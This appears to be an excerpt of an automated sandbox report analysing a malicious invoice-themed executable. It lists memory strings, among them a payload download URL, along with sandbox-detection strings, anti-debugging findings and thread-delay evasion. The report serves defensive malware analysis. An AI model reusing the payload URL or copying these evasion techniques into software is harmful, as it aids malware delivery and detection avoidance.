Source: draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://STATUSWAR.INFO/GHDFR/BIN_ROLFDOAA61.BIN
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL

Source: C:\Windows\explorer.exe TID: 5836	Thread sleep time: -265000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2524	Thread sleep count: 111 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2524	Thread sleep time: -222000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\draft_inv dec21.exe

Code function: 1_2_024308D3 rdtsc

1_2_024308D3

Source: C:\Users\user\Desktop\draft_inv dec21.exe	API coverage: 1.1 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 2.1 %

Source: C:\Users\user\Desktop\draft_inv dec21.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\draft_inv dec21.exe

System information queried: ModuleInformation

Jump to behavior

Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: explorer.exe, 0000000A.00000000.6845627993.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6746869625.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6797467749.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7078654239.00000000099AD000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW(( H
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: draft_inv dec21.exe, 00000008.00000003.6915277582.0000000000886000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726846989.0000000000886000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6725996771.0000000000886000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6920648507.0000000000886000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6766142361.0000000010AD9000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097429161.0000000010AD9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000000.6865990791.0000000011420000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6768580400.0000000011420000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6817962178.0000000011420000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW q
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\draft_inv dec21.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\draft_inv dec21.exe

Code function: 1_2_024308D3 rdtsc

1_2_024308D3

Source: C:\Users\user\Desktop\draft_inv dec21.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0242FFE4 mov eax, dword ptr fs:[00000030h]	1_2_0242FFE4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_02431671 mov eax, dword ptr fs:[00000030h]	1_2_02431671
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0242F610 mov eax, dword ptr fs:[00000030h]	1_2_0242F610
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0242C50C mov eax, dword ptr fs:[00000030h]	1_2_0242C50C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAE89 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAE89
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAE89 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAE89
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DBE80 mov eax, dword ptr fs:[00000030h]	8_2_1E8DBE80
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ECEA0 mov eax, dword ptr fs:[00000030h]	8_2_1E8ECEA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E2EB8 mov eax, dword ptr fs:[00000030h]	8_2_1E8E2EB8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E2EB8 mov eax, dword ptr fs:[00000030h]	8_2_1E8E2EB8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E970EAD mov eax, dword ptr fs:[00000030h]	8_2_1E970EAD
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E970EAD mov eax, dword ptr fs:[00000030h]	8_2_1E970EAD
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h]	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E979ED2 mov eax, dword ptr fs:[00000030h]	8_2_1E979ED2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F1ED8 mov eax, dword ptr fs:[00000030h]	8_2_1E8F1ED8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984EC1 mov eax, dword ptr fs:[00000030h]	8_2_1E984EC1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBED0 mov eax, dword ptr fs:[00000030h]	8_2_1E8EBED0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E1EED mov eax, dword ptr fs:[00000030h]	8_2_1E8E1EED
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E1EED mov eax, dword ptr fs:[00000030h]	8_2_1E8E1EED
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E1EED mov eax, dword ptr fs:[00000030h]	8_2_1E8E1EED
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h]	8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h]	8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h]	8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h]	8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B3EE2 mov eax, dword ptr fs:[00000030h]	8_2_1E8B3EE2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E953EFC mov eax, dword ptr fs:[00000030h]	8_2_1E953EFC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96EEE7 mov eax, dword ptr fs:[00000030h]	8_2_1E96EEE7
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]	8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]	8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]	8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]	8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]	8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]	8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B3E01 mov eax, dword ptr fs:[00000030h]	8_2_1E8B3E01
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h]	8_2_1E8B6E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h]	8_2_1E8B6E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h]	8_2_1E8B6E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h]	8_2_1E8B6E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h]	8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h]	8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h]	8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h]	8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ABE18 mov ecx, dword ptr fs:[00000030h]	8_2_1E8ABE18
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E8E15 mov eax, dword ptr fs:[00000030h]	8_2_1E8E8E15
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984E03 mov eax, dword ptr fs:[00000030h]	8_2_1E984E03
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B3E14 mov eax, dword ptr fs:[00000030h]	8_2_1E8B3E14
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B3E14 mov eax, dword ptr fs:[00000030h]	8_2_1E8B3E14
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B3E14 mov eax, dword ptr fs:[00000030h]	8_2_1E8B3E14
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E946E30 mov eax, dword ptr fs:[00000030h]	8_2_1E946E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E946E30 mov eax, dword ptr fs:[00000030h]	8_2_1E946E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h]	8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E945E30 mov ecx, dword ptr fs:[00000030h]	8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h]	8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h]	8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h]	8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h]	8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h]	8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h]	8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h]	8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h]	8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ECE3F mov eax, dword ptr fs:[00000030h]	8_2_1E8ECE3F
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B2E32 mov eax, dword ptr fs:[00000030h]	8_2_1E8B2E32
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h]	8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h]	8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92DE50 mov ecx, dword ptr fs:[00000030h]	8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h]	8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h]	8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DEE48 mov eax, dword ptr fs:[00000030h]	8_2_1E8DEE48
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AFE40 mov eax, dword ptr fs:[00000030h]	8_2_1E8AFE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AAE40 mov eax, dword ptr fs:[00000030h]	8_2_1E8AAE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AAE40 mov eax, dword ptr fs:[00000030h]	8_2_1E8AAE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AAE40 mov eax, dword ptr fs:[00000030h]	8_2_1E8AAE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ADE45 mov eax, dword ptr fs:[00000030h]	8_2_1E8ADE45
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ADE45 mov ecx, dword ptr fs:[00000030h]	8_2_1E8ADE45
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ABE60 mov eax, dword ptr fs:[00000030h]	8_2_1E8ABE60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ABE60 mov eax, dword ptr fs:[00000030h]	8_2_1E8ABE60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96EE78 mov eax, dword ptr fs:[00000030h]	8_2_1E96EE78
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984E62 mov eax, dword ptr fs:[00000030h]	8_2_1E984E62
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h]	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B1E70 mov eax, dword ptr fs:[00000030h]	8_2_1E8B1E70
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ECE70 mov eax, dword ptr fs:[00000030h]	8_2_1E8ECE70
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E7E71 mov eax, dword ptr fs:[00000030h]	8_2_1E8E7E71
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E938F8B mov eax, dword ptr fs:[00000030h]	8_2_1E938F8B
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E938F8B mov eax, dword ptr fs:[00000030h]	8_2_1E938F8B
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E938F8B mov eax, dword ptr fs:[00000030h]	8_2_1E938F8B
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov ecx, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DBF93 mov eax, dword ptr fs:[00000030h]	8_2_1E8DBF93
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B1FAA mov eax, dword ptr fs:[00000030h]	8_2_1E8B1FAA
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E8FBC mov eax, dword ptr fs:[00000030h]	8_2_1E8E8FBC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B4FB6 mov eax, dword ptr fs:[00000030h]	8_2_1E8B4FB6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DCFB0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DCFB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DCFB0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DCFB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96EFD3 mov eax, dword ptr fs:[00000030h]	8_2_1E96EFD3
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ABFC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8ABFC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h]	8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h]	8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h]	8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FFDC mov ecx, dword ptr fs:[00000030h]	8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h]	8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h]	8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A9FD0 mov eax, dword ptr fs:[00000030h]	8_2_1E8A9FD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h]	8_2_1E931FC9
